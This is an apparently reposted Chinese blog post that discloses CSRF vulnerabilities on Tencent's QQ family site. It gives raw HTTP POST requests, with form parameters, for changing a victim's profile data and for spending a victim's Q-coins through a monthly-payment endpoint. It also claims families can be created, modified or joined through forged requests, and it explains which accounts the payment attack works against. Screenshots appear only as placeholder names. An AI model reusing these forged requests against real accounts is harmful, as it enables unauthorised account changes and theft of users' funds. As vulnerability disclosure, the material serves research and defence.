腾讯QQ家族任意支付QB+修改资料csrf

http://jz.qq.com/m_card.shtml

wps_clip_image-10865

POST /cgi-bin/league_change_userinfo HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 171

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/inc/m_card.shtml

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-14458

mobile=13800138000&email=y0umer%40sina.com&nation=1&province=1&city=1&signature=%CE%D2%B2%BB%B8%F6%D0%D4&introduce=%D0%A3%B3%A4&security=1&isaccept=1&image.x=38&image.y=16

wps_clip_image-3473

wps_clip_image-32098

wps_clip_image-23198

还有可以csrf劫持创建家族.. 修改家族..

随意加入家族..

wps_clip_image-3854

据说还可以随意挥霍QB..

任意支付漏洞:

POST /cgi-bin/league_month_pay HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 46

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/cgi-bin/league_month_show?leagueid=716740

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-22213

Month 就相当于支付几QB, 1是一月  1月2qb..

wps_clip_image-13375

利用说明:任意支付只是面向没有设置QB支付验证的号码,并且加入了家族才能支付成功(因此比较鸡肋)

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/y0umer/p/3186159.html